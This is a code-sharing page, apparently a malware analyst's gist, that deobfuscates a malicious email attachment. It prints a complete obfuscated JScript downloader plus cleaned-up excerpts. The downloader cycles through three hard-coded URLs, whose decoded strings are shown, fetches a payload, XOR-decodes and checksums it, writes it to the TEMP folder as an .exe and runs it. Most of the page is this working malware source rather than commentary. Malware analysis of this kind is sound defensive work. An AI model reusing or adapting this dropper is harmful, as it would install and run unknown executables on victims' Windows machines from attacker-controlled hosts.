Skip to content

Instantly share code, notes, and snippets.

@hasherezade

hasherezade/stage2.js Secret

Last active July 27, 2016 16:42
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save hasherezade/07aa0c5252f84dd57bcc305af4a61012 to your computer and use it in GitHub Desktop.
Save hasherezade/07aa0c5252f84dd57bcc305af4a61012 to your computer and use it in GitHub Desktop.
Download ZIP
Deobfuscating malicious attachment
Raw
stage2.js
var Bv2 = "e" + "";
var Vt0 = "clos" + "";
var Dk7 = "oFile" + "";
var MBv3 = "SaveT" + "";
function WPe2(UUp2) {
return UUp2;
};
var IGi = "eText" + "";
var Zn2 = "it" + "";
var ZCq4 = "wr" + "";
var JCw8 = "n" + "";
var Fp0 = "ope" + "";
var Mp8 = "et" + "";
var JHb6 = "Chars" + "";
var It = "pe" + "";
var OXj = "ty" + "";
var VDt = "am" + "";
var ESy = "tre" + "";
var Jm0 = ".S" + "";
var QRc1 = "DB" + "";
var UDy7 = "ADO" + "";
var Em1 = "t" + "";
var CQs5 = "jec" + "";
var En = "Ob" + "";
var LPa9 = "te" + "";
var Vo0 = "Crea" + "";
var Fu7 = "join" + "";
function Ep0(Ks) {
return Ks;
};
var Vq1 = "e" + "";
var Hc = "arCod" + "";
var Qo5 = "Ch" + "";
var Gm0 = "from" + "";
var PSg = "gth" + "";
var KBx1 = "len" + "";
var Ie1 = "push" + "";
var SOc = "At" + "";
var URe7 = "de" + "";
var Zk = "Co" + "";
var Fx = "char" + "";
var Ap5 = "h" + "";
var LDx0 = "lengt" + "";
var Kz = "ose" + "";
var Cl = "cl" + "";
function NUl(Oq1) {
return Oq1;
};
var Uj = "ext" + "";
var BJz3 = "ReadT" + "";
function QIi2(PIt) {
return PIt;
};
var Wm7 = "le" + "";
var QSa = "Fi" + "";
var WVa1 = "om" + "";
var MCp5 = "Fr" + "";
var LGl = "Load" + "";
var Cu1 = "open" + "";
var Lw5 = "set" + "";
var DLj = "ar" + "";
var Ud = "Ch" + "";
var Ne7 = "type" + "";
var PIx = "am" + "";
var XYp6 = "tre" + "";
var RWh8 = ".S" + "";
var Ve = "DB" + "";
var Fm = "ADO" + "";
var ZWj = "bject" + "";
var Ps0 = "teO" + "";
var AVj = "Crea" + "";
var Az40 = "th" + "";
var Xb = "leng" + "";
var ROi = "gth" + "";
var Zx = "len" + "";
var EYf = "ce" + "";
var TJo = "spli" + "";
var Of = "gth" + "";
var Fq = "len" + "";
var Py8 = "th" + "";
var IAi = "leng" + "";
var Ic = "h" + "";
var MAs3 = "lengt" + "";
var VLw = "th" + "";
var GRr = "ng" + "";
var Gm = "le" + "";
var Xj = "th" + "";
var Pf = "leng" + "";
var OFc0 = "eep" + "";
var UHt = "Sl" + "";
var NFc = "21" + "";
var RFp1 = " 3" + "";
var VQv = "Run" + "";
var Bw9 = "th" + "";
var NDt6 = "leng" + "";
var Bm6 = "ngth" + "";
var Np = "le" + "";
var Id = "close" + "";
var FAm = "e" + "";
var Sg = "oFil" + "";
var ZLe2 = "SaveT" + "";
function Sn0(Sq5) {
return Sq5;
};
var Om7 = "tion" + "";
var Il4 = "posi" + "";
var AZd = "y" + "";
var Wh8 = "eBod" + "";
var Ck0 = "pons" + "";
var KOn5 = "Res" + "";
var DLb = "te" + "";
var KFl = "wri" + "";
function VBc(FXk1) {
return FXk1;
};
var Jl9 = "type" + "";
var EPy4 = "open" + "";
function IVt3(WEc) {
return WEc;
};
var Zo = "m" + "";
var NAm = "ea" + "";
var XMl = ".Str" + "";
var SSp = "ODB" + "";
var DOf3 = "AD" + "";
var BJx7 = "t" + "";
var FJb5 = "ec" + "";
var Tt = "Obj" + "";
var Ob4 = "eate" + "";
var Mj = "Cr" + "";
var OEc2 = "Sleep" + "";
var CMj8 = "nd" + "";
var Cp = "se" + "";
var Te = "h" + "";
var WMd = "lengt" + "";
var HTb = "GET" + "";
var BMy = "open" + "";
function We0(Wa4) {
return Wa4;
};
var Pp = "eep" + "";
var Zj3 = "Sl" + "";
var ZNj3 = "th" + "";
var IAd = "leng" + "";
var Gg0 = "ect" + "";
var Ck = "teObj" + "";
var TNt = "Crea" + "";
var RUi4 = "th" + "";
var Yu = "leng" + "";
var SSr = "P" + "";
var GKn7 = "MLHTT" + "";
var IDf = "L2.X" + "";
var BVv2 = "MSXM" + "";
function Ia(RWl3) {
return RWl3;
};
var Nj = ".1" + "";
var NWt = ".5" + "";
var Yi = "est" + "";
var XSa2 = "pRequ" + "";
var BKw = "Htt" + "";
var Hp1 = "Win" + "";
var APf = "Http." + "";
var Mf5 = "Win" + "";
var SDf = "+/" + "";
var Ww0 = "89" + "";
var Ej1 = "4567" + "";
var AZq = "z0123" + "";
var Ym = "wxy" + "";
var Jq9 = "tuv" + "";
var Nh1 = "opqrs" + "";
var Yl = "mn" + "";
var Jl = "kl" + "";
var WJp = "fghij" + "";
var Er3 = "abcde" + "";
var Vo = "YZ" + "";
var XKm = "WX" + "";
var Is = "STUV" + "";
var VIp = "NOPQR" + "";
var Aa9 = "JKLM" + "";
var Iv9 = "HI" + "";
var Oo0 = "FG" + "";
var BEs0 = "ABCDE" + "";
var Td = "xe" + "";
var YWy = ".e" + "";
var Ww = "X" + "";
var KFu5 = "Lzkk2" + "";
var Hl = "sio" + "";
function WAi1(Jj6) {
return Jj6;
};
var Oy = "%/" + "";
var Ci6 = "MP" + "";
var NMx8 = "%TE" + "";
var Oq5 = "l" + "";
var GFf = "Shel" + "";
var BXr7 = "pt." + "";
var Fe6 = "WScri" + "";
function ZZq3(JKs) {
return JKs;
};
function LAm(FZi3) {
return FZi3;
};
function Oo(Rq3) {
return Rq3;
};
function Rg(NZw4) {
return NZw4;
};
function Ul(GUy) {
return GUy;
};
function TZu(KVk) {
return KVk;
};
var QAt4 = "ct" + "";
var FTv4 = "je" + "";
var SMd9 = "ateOb" + "";
var Es = "Cre" + "";
var Dw = "0" + "";
var Az4 = "i7" + "";
function BEi(YUb) {
return YUb;
};
var Yf4 = "0v" + "";
var DNw = "z/g" + "";
var Zh = "n" + "";
var HUv = "o." + "";
var Jw = ".c" + "";
function WZg(SVi1) {
return SVi1;
};
var Dz3 = "erty" + "";
var LCg6 = "isdoh" + "";
function Ex5(Fa1) {
return Fa1;
};
var UEo6 = "dav" + "";
function DOo6(PZs3) {
return PZs3;
};
var FRt = "/" + "";
var Fl = "tp:/" + "";
var Uq3 = "ht" + "";
function FWe(Qz1) {
return Qz1;
};
var MAp7 = "gc" + "";
var Iq = "gyn" + "";
var KKd1 = "y" + "";
var Uc = "m/" + "";
var PUd4 = "co" + "";
var AFi = "tle." + "";
var Nr9 = "bot" + "";
var COk = "ix" + "";
var VSn = "at" + "";
function YJi0(RZl8) {
return RZl8;
};
var Nv = "qu" + "";
var Jx1 = "/a" + "";
var Rl5 = ":/" + "";
var Tx0 = "http" + "";
var Bk5 = "8k" + "";
function WCm1(ZCp) {
return ZCp;
};
var Tx = "4" + "";
var CUp = "zrg" + "";
var Kn2 = "8" + "";
var Fw3 = "m/" + "";
var JBk4 = "o" + "";
var HDq = "oy.c" + "";
var Vt = "ezH" + "";
var Aa = "avid" + "";
var Cz = "n" + "";
var XTe8 = "//Be" + "";
var OMp7 = "tp:" + "";
var Aq5 = "ht" + "";
var CVc = "437" + "";
var Sv = "gth" + "";
var Uy2 = "len" + "";
function LQo5(ZKy) {
return ZKy;
};
var EPd2 = "ddddd" + "";
var Yk = "dd" + "";
var XGu4 = "dd" + "";
var Pk = "ddddd" + "";
var JDx0 = "ddddd" + "";
var Ov0 = "ddd" + "";
var Vz5 = "dddd" + "";
var KCe = "ddddd" + "";
var HXr1 = "dddd" + "";
var Ed5 = "dddd" + "";
var Pr9 = "dddd" + "";
var Nt0 = "ddddd" + "";
var GJk2 = "ddddd" + "";
var Ml8 = "ddd" + "";
var Kp7 = "fd" + "";
var Vc3 = "as" + "";
var DMg8 = "sdf" + "";
var Cq4 = "fa" + "";
var Hn1 = "as" + "";
var Xp9 = "h" + "";
var Wz5 = "ngt" + "";
var UYv6 = "le" + "";
function Ln7(Rk6) {
return Rk6;
};
function Fj(Fu4) {
return Fu4;
};
function Ie(FKn2) {
return FKn2;
};
function Bm(GRl8) {
return GRl8;
};
function Xu(Jm) {
return Jm;
};
var ZOp9 = "d" + "";
var FPy5 = "dddd" + "";
var Jc9 = "ddd" + "";
var Eq = "ddddd" + "";
var Sk6 = "ddd" + "";
var BHv = "ddd" + "";
var Xf2 = "dddd" + "";
var RKt8 = "dd" + "";
var Qj7 = "dddd" + "";
var ABv = "ddd" + "";
var Sm9 = "dd" + "";
var Mh = "ddddd" + "";
var Ha0 = "dd" + "";
var Xa0 = "ddd" + "";
var Pr3 = "dd" + "";
var ZPa = "dddd" + "";
var Tj = "dddd" + "";
var Qu4 = "ddd" + "";
var Gs = "ddddd" + "";
function Mn0(Lr1) {
return Lr1;
};
function YBi9(Gl5) {
return Gl5;
};
function DXa5(Yg6) {
return Yg6;
};
var Nt = "th" + "";
var Ep = "leng" + "";
function UAc1(KXm5) {
return KXm5;
};
function FWp(HCt5) {
return HCt5;
};
var Cf7 = "ddd" + "";
var QRu9 = "dd" + "";
var Xa = "ddddd" + "";
var WNv = "dddd" + "";
var YGy5 = "dddd" + "";
var Sv9 = "dddd" + "";
var Pm8 = "dd" + "";
var MHw7 = "dd" + "";
var Dd = "dd" + "";
var Wn = "dd" + "";
var Nn0 = "ddddd" + "";
var Nx0 = "dd" + "";
var JSj7 = "dddd" + "";
var Kz6 = "dddd" + "";
function QSh9(DJw) {
return DJw;
};
var MBm7 = "23132" + "";
var Co2 = "11" + "";
var Pv6 = (QSh9(Co2) + MBm7, Kz6 + JSj7 + Nx0 + Nn0 + Wn + Dd + MHw7 + Pm8 + Sv9 + UAc1(YGy5) + WNv + Xa + QRu9 + FWp(Cf7));
var Jb = Pv6[(function FSa7() {
return Ep;
}()) + Nt];
var Nv5 = (Gs + Ln7(Qu4) + Tj + ZPa + Pr3 + Xa0 + Fj(Ha0) + Mh + Sm9 + (function DRp3() {
return ABv;
}()) + Qj7 + RKt8 + Ie(Xf2) + (function Rm() {
return BHv;
}()) + Sk6 + Eq + Bm(Jc9) + FPy5 + Xu(ZOp9));
var Mi = 0.349591;
var QTh = Nv5[(function JFo() {
return Ep;
}()) + Nt];
var JUs = (Hn1 + Cq4 + DMg8 + (function Ps() {
return Vc3;
}()) + Kp7, Ml8 + GJk2 + Nt0 + LQo5(Pr9) + Ed5 + HXr1 + KCe + (function AAe6() {
return Vz5;
}()) + Ov0 + JDx0 + Pk + (function Gx() {
return XGu4;
}()) + Yk + EPd2);
var Nk = JUs[Ep + Nt];
var BFz = 1;
var Sq = 2;
var Kn5 = 2;
var WKs8 = "437";
var VVq = [Aq5 + OMp7 + (function Pe() {
return XTe8;
}()) + Cz + Aa + Vt + HDq + JBk4 + Fw3 + (function UZh() {
return Kn2;
}()) + (function DZe() {
return CUp;
}()) + WCm1(Tx) + Bk5, Tx0 + (function Zq() {
return Rl5;
}()) + (function GOv() {
return Jx1;
}()) + YJi0(Nv) + VSn + COk + Nr9 + (function Ur2() {
return AFi;
}()) + PUd4 + Uc + (function Ci() {
return KKd1;
}()) + (function PJm6() {
return Iq;
}()) + FWe(MAp7), Aq5 + DOo6(Fl) + (function GYg2() {
return FRt;
}()) + Ex5(UEo6) + LCg6 + WZg(Dz3) + Jw + HUv + Zh + BEi(DNw) + (function YVj() {
return Yf4;
}()) + Az4 + Dw];
var Sn = WScript[(function XGd4() {
return Es;
}()) + (function HPf8() {
return SMd9;
}()) + ZZq3(FTv4) + LAm(QAt4)](Fe6 + BXr7 + GFf + (function Sy9() {
return Oq5;
}()));
var Hm4 = Sn.ExpandEnvironmentStrings(NMx8 + WAi1(Ci6) + Oy);
var DJt9 = Hm4 + Hl + KFu5 + Ww;
var Vh9 = DJt9 + YWy + Td;
function uheprng() {
return (function() {
var o = 48,
c = 1,
p = o,
s = new Array(o);
var i, j;
var base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var mash = Mash();
for (i = 0; i < o; i++) s[i] = mash(Mi);
mash = null;
var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}
function rawprng() {
if (++p >= o) p = 0;
var t = 1768863 * s[p] + c * 2.3283064365386963e-10;
return s[p] = t - (c = t | (1 * 0));
}
return random;
}());
};
function Mash() {
var n = 0xefc8249d;
var mash = function(data) {
if (data) {
data = data.toString();
for (var i = 0; i < data.length; i++) {
n += data.charCodeAt(i);
var h = 0.02519603282416938 * n;
n = h >>> 0;
h -= n;
h *= n;
n = h >>> 0;
h -= n;
n += h * 0x100000000;
}
return (n >>> 0) * 2.3283064365386963e-10;
} else n = 0xefc8249d;
};
return mash;
}
var SWh3 = [Mf5 + (function AYd() {
return APf;
}()) + Hp1 + BKw + XSa2 + Ia(Yi) + NWt + Nj, BVv2 + (function Ai7() {
return IDf;
}()) + GKn7 + (function Jn3() {
return SSr;
}())];
for (var KFh4 = 0; KFh4 < SWh3[(function HMo2() {
return Ep;
}()) + Nt]; KFh4++) {
try {
var Yr2 = WScript[Es + SMd9 + FTv4 + (function MOv() {
return QAt4;
}())](SWh3[KFh4]);
break;
} catch (e) {
continue;
}
};
var ORj1 = -1849 + 1850;
var Vc6 = 2477 - 2477;
do {
try {
if (1 == ORj1) {
if (Vc6 >= VVq[Ep + Nt]) {
Vc6 = 0;
WScript[Zj3 + We0(Pp)](1000);
}
Yr2[BMy](HTb, VVq[Vc6++ % VVq[Ep + (function VSc8() {
return Nt;
}())]], false);
Yr2[Cp + CMj8]();
}
if (Yr2.readystate < 4) {
WScript[Zj3 + Pp](100);
continue;
}
var IUh = WScript[Es + Oo(SMd9) + FTv4 + QAt4](DOf3 + SSp + XMl + IVt3(NAm) + Zo);
IUh[BMy]();
IUh[Jl9] = BFz;
IUh[(function Ir6() {
return KFl;
}()) + DLb](Yr2[KOn5 + Ck0 + Wh8 + AZd]);
IUh[Sn0(Il4) + Om7] = 0;
IUh[ZLe2 + Sg + FAm](DJt9, Kn5);
IUh[Id]();
var GHq4 = Nh(DJt9);
GHq4 = Zy(GHq4);
if (GHq4[Mn0(Ep) + (function NUa() {
return Nt;
}())] < 100 * 1024 || GHq4[(function WGk0() {
return Ep;
}()) + Nt] > 230 * 1024 || !ZZr(GHq4)) {
ORj1 = 1;
continue;
}
try {
STn(Vh9 /* b */ , GHq4);
} catch (e) {
break;
};
Sn[VQv](Vh9 /* b */ + (function Du() {
return RFp1;
}()) + NFc);
break;
} catch (e) {
WScript[Zj3 + Pp](167 * 5 + 165);
continue;
};
} while (ORj1);
WScript.Quit(0);
function Zy(WPx8) {
var NKh;
var Je = uheprng();
for (var KFh4 = 0; KFh4 < WPx8[Ep + Nt]; KFh4++) {
WPx8[KFh4] ^= Je(121 * 2 + 14);
}
var Rm5 = WPx8[WPx8[Ep + Nt] - 4] | WPx8[WPx8[(function AMo() {
return Ep;
}()) + YBi9(Nt)] - 3] << (9331 - 9323) | WPx8[WPx8[Ep + Nt] - 2] << 16 | WPx8[WPx8[Ep + Nt] - 1] << 24;
WPx8[TJo + EYf](GHq4[(function Wn0() {
return Ep;
}()) + Nt] - 4, 2 * 2);
NKh = Jb;
for (var KFh4 = 0; KFh4 < WPx8[Ep + Nt]; KFh4++) {
NKh = (NKh + WPx8[KFh4]) % 0x100000000;
};
if (NKh != Rm5) {
return [];
};
return WPx8;
};
function ZZr(WPx8) {
if (WPx8[0] == 0x4D && WPx8[6339 - 6338] == 0x5a) {
return true;
} else {
return false;
}
};
function Nh(Vd1) {
var Jf8 = WScript[Rg(Es) + SMd9 + Ul(FTv4) + QAt4](DOf3 + SSp + XMl + NAm + Zo);
Jf8[Jl9] = Sq;
Jf8[Ud + DLj + Lw5] = WKs8;
Jf8[BMy]();
Jf8[QIi2(LGl) + MCp5 + WVa1 + QSa + (function Vi4() {
return Wm7;
}())](Vd1);
var WMj5 = Jf8[BJz3 + NUl(Uj)];
Jf8[(function Ms() {
return Id;
}())]();
return JGt5(WMj5);
};
function JGt5(DLq8) {
var TNv = new Array();
TNv[0xC7] = 0x80;
TNv[0xFC] = 0x81;
TNv[0xE9] = 0x82;
TNv[0xE2] = 0x83;
TNv[0xE4] = 0x84;
TNv[0xE0] = 0x85;
TNv[0xE5] = 0x86;
TNv[0xE7] = 0x87;
TNv[0xEA] = 0x88;
TNv[0xEB] = 0x89;
TNv[0xE8] = 0x8A;
TNv[0xEF] = 0x8B;
TNv[0xEE] = 0x8C;
TNv[0xEC] = 0x8D;
TNv[0xC4] = 0x8E;
TNv[0xC5] = 0x8F;
TNv[0xC9] = 0x90;
TNv[0xE6] = 0x91;
TNv[0xC6] = 0x92;
TNv[0xF4] = 0x93;
TNv[0xF6] = 0x94;
TNv[0xF2] = 0x95;
TNv[0xFB] = 0x96;
TNv[0xF9] = 0x97;
TNv[0xFF] = 0x98;
TNv[0xD6] = 0x99;
TNv[0xDC] = 0x9A;
TNv[0xA2] = 0x9B;
TNv[0xA3] = 0x9C;
TNv[0xA5] = 0x9D;
TNv[0x20A7] = 0x9E;
TNv[0x192] = 0x9F;
TNv[0xE1] = 0xA0;
TNv[0xED] = 0xA1;
TNv[0xF3] = 0xA2;
TNv[0xFA] = 0xA3;
TNv[0xF1] = 0xA4;
TNv[0xD1] = 0xA5;
TNv[0xAA] = 0xA6;
TNv[0xBA] = 0xA7;
TNv[0xBF] = 0xA8;
TNv[0x2310] = 0xA9;
TNv[0xAC] = 0xAA;
TNv[0xBD] = 0xAB;
TNv[0xBC] = 0xAC;
TNv[0xA1] = 0xAD;
TNv[0xAB] = 0xAE;
TNv[0xBB] = 0xAF;
TNv[0x2591] = 0xB0;
TNv[0x2592] = 0xB1;
TNv[0x2593] = 0xB2;
TNv[0x2502] = 0xB3;
TNv[0x2524] = 0xB4;
TNv[0x2561] = 0xB5;
TNv[0x2562] = 0xB6;
TNv[0x2556] = 0xB7;
TNv[0x2555] = 0xB8;
TNv[0x2563] = 0xB9;
TNv[0x2551] = 0xBA;
TNv[0x2557] = 0xBB;
TNv[0x255D] = 0xBC;
TNv[0x255C] = 0xBD;
TNv[0x255B] = 0xBE;
TNv[0x2510] = 0xBF;
TNv[0x2514] = 0xC0;
TNv[0x2534] = 0xC1;
TNv[0x252C] = 0xC2;
TNv[0x251C] = 0xC3;
TNv[0x2500] = 0xC4;
TNv[0x253C] = 0xC5;
TNv[0x255E] = 0xC6;
TNv[0x255F] = 0xC7;
TNv[0x255A] = 0xC8;
TNv[0x2554] = 0xC9;
TNv[0x2569] = 0xCA;
TNv[0x2566] = 0xCB;
TNv[0x2560] = 0xCC;
TNv[0x2550] = 0xCD;
TNv[0x256C] = 0xCE;
TNv[0x2567] = 0xCF;
TNv[0x2568] = 0xD0;
TNv[0x2564] = 0xD1;
TNv[0x2565] = 0xD2;
TNv[0x2559] = 0xD3;
TNv[0x2558] = 0xD4;
TNv[0x2552] = 0xD5;
TNv[0x2553] = 0xD6;
TNv[0x256B] = 0xD7;
TNv[0x256A] = 0xD8;
TNv[0x2518] = 0xD9;
TNv[0x250C] = 0xDA;
TNv[0x2588] = 0xDB;
TNv[0x2584] = 0xDC;
TNv[0x258C] = 0xDD;
TNv[0x2590] = 0xDE;
TNv[0x2580] = 0xDF;
TNv[0x3B1] = 0xE0;
TNv[0xDF] = 0xE1;
TNv[0x393] = 0xE2;
TNv[0x3C0] = 0xE3;
TNv[0x3A3] = 0xE4;
TNv[0x3C3] = 0xE5;
TNv[0xB5] = 0xE6;
TNv[0x3C4] = 0xE7;
TNv[0x3A6] = 0xE8;
TNv[0x398] = 0xE9;
TNv[0x3A9] = 0xEA;
TNv[0x3B4] = 0xEB;
TNv[0x221E] = 0xEC;
TNv[0x3C6] = 0xED;
TNv[0x3B5] = 0xEE;
TNv[0x2229] = 0xEF;
TNv[0x2261] = 0xF0;
TNv[0xB1] = 0xF1;
TNv[0x2265] = 0xF2;
TNv[0x2264] = 0xF3;
TNv[0x2320] = 0xF4;
TNv[0x2321] = 0xF5;
TNv[0xF7] = 0xF6;
TNv[0x2248] = 0xF7;
TNv[0xB0] = 0xF8;
TNv[0x2219] = 0xF9;
TNv[0xB7] = 0xFA;
TNv[0x221A] = 0xFB;
TNv[0x207F] = 0xFC;
TNv[0xB2] = 0xFD;
TNv[0x25A0] = 0xFE;
TNv[0xA0] = 0xFF;
var GHq4 = new Array();
for (var KFh4 = 0; KFh4 < DLq8[Ep + Nt]; KFh4++) {
var Ha = DLq8[Fx + Zk + (function Mp2() {
return URe7;
}()) + SOc](KFh4);
if (Ha < (36 * 3 + 20)) {
var OTl4 = Ha;
} else {
var OTl4 = TNv[Ha];
}
GHq4[(function Mv() {
return Ie1;
}())](OTl4);
};
return GHq4;
};
function JSk(WPx8) {
var Vd = new Array();
Vd[0x80] = 0x00C7;
Vd[0x81] = 0x00FC;
Vd[0x82] = 0x00E9;
Vd[0x83] = 0x00E2;
Vd[0x84] = 0x00E4;
Vd[0x85] = 0x00E0;
Vd[0x86] = 0x00E5;
Vd[0x87] = 0x00E7;
Vd[0x88] = 0x00EA;
Vd[0x89] = 0x00EB;
Vd[0x8A] = 0x00E8;
Vd[0x8B] = 0x00EF;
Vd[0x8C] = 0x00EE;
Vd[0x8D] = 0x00EC;
Vd[0x8E] = 0x00C4;
Vd[0x8F] = 0x00C5;
Vd[0x90] = 0x00C9;
Vd[0x91] = 0x00E6;
Vd[0x92] = 0x00C6;
Vd[0x93] = 0x00F4;
Vd[0x94] = 0x00F6;
Vd[0x95] = 0x00F2;
Vd[0x96] = 0x00FB;
Vd[0x97] = 0x00F9;
Vd[0x98] = 0x00FF;
Vd[0x99] = 0x00D6;
Vd[0x9A] = 0x00DC;
Vd[0x9B] = 0x00A2;
Vd[0x9C] = 0x00A3;
Vd[0x9D] = 0x00A5;
Vd[0x9E] = 0x20A7;
Vd[0x9F] = 0x0192;
Vd[0xA0] = 0x00E1;
Vd[0xA1] = 0x00ED;
Vd[0xA2] = 0x00F3;
Vd[0xA3] = 0x00FA;
Vd[0xA4] = 0x00F1;
Vd[0xA5] = 0x00D1;
Vd[0xA6] = 0x00AA;
Vd[0xA7] = 0x00BA;
Vd[0xA8] = 0x00BF;
Vd[0xA9] = 0x2310;
Vd[0xAA] = 0x00AC;
Vd[0xAB] = 0x00BD;
Vd[0xAC] = 0x00BC;
Vd[0xAD] = 0x00A1;
Vd[0xAE] = 0x00AB;
Vd[0xAF] = 0x00BB;
Vd[0xB0] = 0x2591;
Vd[0xB1] = 0x2592;
Vd[0xB2] = 0x2593;
Vd[0xB3] = 0x2502;
Vd[0xB4] = 0x2524;
Vd[0xB5] = 0x2561;
Vd[0xB6] = 0x2562;
Vd[0xB7] = 0x2556;
Vd[0xB8] = 0x2555;
Vd[0xB9] = 0x2563;
Vd[0xBA] = 0x2551;
Vd[0xBB] = 0x2557;
Vd[0xBC] = 0x255D;
Vd[0xBD] = 0x255C;
Vd[0xBE] = 0x255B;
Vd[0xBF] = 0x2510;
Vd[0xC0] = 0x2514;
Vd[0xC1] = 0x2534;
Vd[0xC2] = 0x252C;
Vd[0xC3] = 0x251C;
Vd[0xC4] = 0x2500;
Vd[0xC5] = 0x253C;
Vd[0xC6] = 0x255E;
Vd[0xC7] = 0x255F;
Vd[0xC8] = 0x255A;
Vd[0xC9] = 0x2554;
Vd[0xCA] = 0x2569;
Vd[0xCB] = 0x2566;
Vd[0xCC] = 0x2560;
Vd[0xCD] = 0x2550;
Vd[0xCE] = 0x256C;
Vd[0xCF] = 0x2567;
Vd[0xD0] = 0x2568;
Vd[0xD1] = 0x2564;
Vd[0xD2] = 0x2565;
Vd[0xD3] = 0x2559;
Vd[0xD4] = 0x2558;
Vd[0xD5] = 0x2552;
Vd[0xD6] = 0x2553;
Vd[0xD7] = 0x256B;
Vd[0xD8] = 0x256A;
Vd[0xD9] = 0x2518;
Vd[0xDA] = 0x250C;
Vd[0xDB] = 0x2588;
Vd[0xDC] = 0x2584;
Vd[0xDD] = 0x258C;
Vd[0xDE] = 0x2590;
Vd[0xDF] = 0x2580;
Vd[0xE0] = 0x03B1;
Vd[0xE1] = 0x00DF;
Vd[0xE2] = 0x0393;
Vd[0xE3] = 0x03C0;
Vd[0xE4] = 0x03A3;
Vd[0xE5] = 0x03C3;
Vd[0xE6] = 0x00B5;
Vd[0xE7] = 0x03C4;
Vd[0xE8] = 0x03A6;
Vd[0xE9] = 0x0398;
Vd[0xEA] = 0x03A9;
Vd[0xEB] = 0x03B4;
Vd[0xEC] = 0x221E;
Vd[0xED] = 0x03C6;
Vd[0xEE] = 0x03B5;
Vd[0xEF] = 0x2229;
Vd[0xF0] = 0x2261;
Vd[0xF1] = 0x00B1;
Vd[0xF2] = 0x2265;
Vd[0xF3] = 0x2264;
Vd[0xF4] = 0x2320;
Vd[0xF5] = 0x2321;
Vd[0xF6] = 0x00F7;
Vd[0xF7] = 0x2248;
Vd[0xF8] = 0x00B0;
Vd[0xF9] = 0x2219;
Vd[0xFA] = 0x00B7;
Vd[0xFB] = 0x221A;
Vd[0xFC] = 0x207F;
Vd[0xFD] = 0x00B2;
Vd[0xFE] = 0x25A0;
Vd[0xFF] = 0x00A0;
var Ie3 = new Array();
var Nr1 = "";
var OTl4;
var Ha;
for (var KFh4 = 0; KFh4 < WPx8[DXa5(Ep) + Nt]; KFh4++) {
OTl4 = WPx8[KFh4];
if (OTl4 < 128) {
Ha = OTl4;
} else {
Ha = Vd[OTl4];
}
Ie3.push(String[Gm0 + Qo5 + Ep0(Hc) + Vq1](Ha));
}
Nr1 = Ie3[Fu7]("");
return Nr1;
};
function STn(Vd1, WPx8) {
var Jf8 = WScript[(function Xc3() {
return Es;
}()) + SMd9 + TZu(FTv4) + QAt4](DOf3 + SSp + (function IUx6() {
return XMl;
}()) + NAm + (function FIg1() {
return Zo;
}()));
Jf8[VBc(Jl9)] = Sq;
Jf8[Ud + DLj + Lw5] = WKs8;
Jf8[BMy]();
Jf8[ZCq4 + Zn2 + WPe2(IGi)](JSk(WPx8));
Jf8[ZLe2 + Sg + FAm](Vd1, -7130 + 7132);
Jf8[Id]();
};
Raw
stage2_deobfuscated_main.js
var ORj1 = 1;
var Vc6 = 0;
do {
try {
if (1 == ORj1) {
if (Vc6 >= VVq["length"]) {
Vc6 = 0;
WScript["Sleep"](1000);
}
Yr2["open"]("GET", VVq[Vc6++ % VVq["length"], false);
Yr2["send"]();
}
if (Yr2.readystate < 4) {
WScript["Sleep"](100);
continue;
}
var IUh = WScript["CreateObject"]("ADODB.Stream");
IUh["open"]();
IUh["type"] = 1;
IUh["write"](Yr2["ResponseBody"]);
IUh["position"] = 0;
var filename = Sn.ExpandEnvironmentStrings("%TEMP%/") + "sioLzkk2X";
IUh["SaveToFile"](filename, 2);
IUh["close"]();
var GHq4 = Nh(filename);
GHq4 = Zy(GHq4);
if (GHq4["length"] < 100 * 1024 || GHq4["length"] > 230 * 1024 || !is_MZ(GHq4)) {
ORj1 = 1;
continue;
}
try {
STn(filename + ".exe" , GHq4);
} catch (e) {
break;
};
Sn["Run"](filename + ".exe" + " 321");
break;
} catch (e) {
WScript["Sleep"](167 * 5 + 165);
continue;
};
} while (ORj1);
WScript.Quit(0);
Raw
stage2_deobfuscated_urls_arr.js
var VVq = ["ht" + "tp:" + "//Be" + "n" + "avid" + "ezH" + "oy.c" + "o" + "m/" + "8" + "zrg" + "4" + "8k",
"http" + ":/" + "/a" + "qu" + "at" + "ix" + "bot" + "tle." + "co" + "m/" + "y" + "gyn" + "gc",
"ht" + "tp:/" + "/" + "dav" + "isdoh" + "erty" + ".c" + "o." + "n" + "z/g" + "0v" + "i7" + "0"];
Raw
stage2_main.js
var ORj1 = -1849 + 1850;
var Vc6 = 2477 - 2477;
do {
try {
if (1 == ORj1) {
if (Vc6 >= VVq[Ep + Nt]) {
Vc6 = 0;
WScript[Zj3 + We0(Pp)](1000);
}
Yr2[BMy](HTb, VVq[Vc6++ % VVq[Ep + (function VSc8() {
return Nt;
}())]], false);
Yr2[Cp + CMj8]();
}
if (Yr2.readystate < 4) {
WScript[Zj3 + Pp](100);
continue;
}
var IUh = WScript[Es + Oo(SMd9) + FTv4 + QAt4](DOf3 + SSp + XMl + IVt3(NAm) + Zo);
IUh[BMy]();
IUh[Jl9] = BFz;
IUh[(function Ir6() {
return KFl;
}()) + DLb](Yr2[KOn5 + Ck0 + Wh8 + AZd]);
IUh[Sn0(Il4) + Om7] = 0;
IUh[ZLe2 + Sg + FAm](DJt9, Kn5);
IUh[Id]();
var GHq4 = Nh(DJt9);
GHq4 = Zy(GHq4);
if (GHq4[Mn0(Ep) + (function NUa() {
return Nt;
}())] < 100 * 1024 || GHq4[(function WGk0() {
return Ep;
}()) + Nt] > 230 * 1024 || !ZZr(GHq4)) {
ORj1 = 1;
continue;
}
try {
STn(Vh9 /* b */ , GHq4);
} catch (e) {
break;
};
Sn[VQv](Vh9 /* b */ + (function Du() {
return RFp1;
}()) + NFc);
break;
} catch (e) {
WScript[Zj3 + Pp](167 * 5 + 165);
continue;
};
} while (ORj1);
WScript.Quit(0);
Raw
stage2_urls_arr.js
var VVq = [Aq5 + OMp7 + (function Pe() {
return XTe8;
}()) + Cz + Aa + Vt + HDq + JBk4 + Fw3 + (function UZh() {
return Kn2;
}()) + (function DZe() {
return CUp;
}()) + WCm1(Tx) + Bk5, Tx0 + (function Zq() {
return Rl5;
}()) + (function GOv() {
return Jx1;
}()) + YJi0(Nv) + VSn + COk + Nr9 + (function Ur2() {
return AFi;
}()) + PUd4 + Uc + (function Ci() {
return KKd1;
}()) + (function PJm6() {
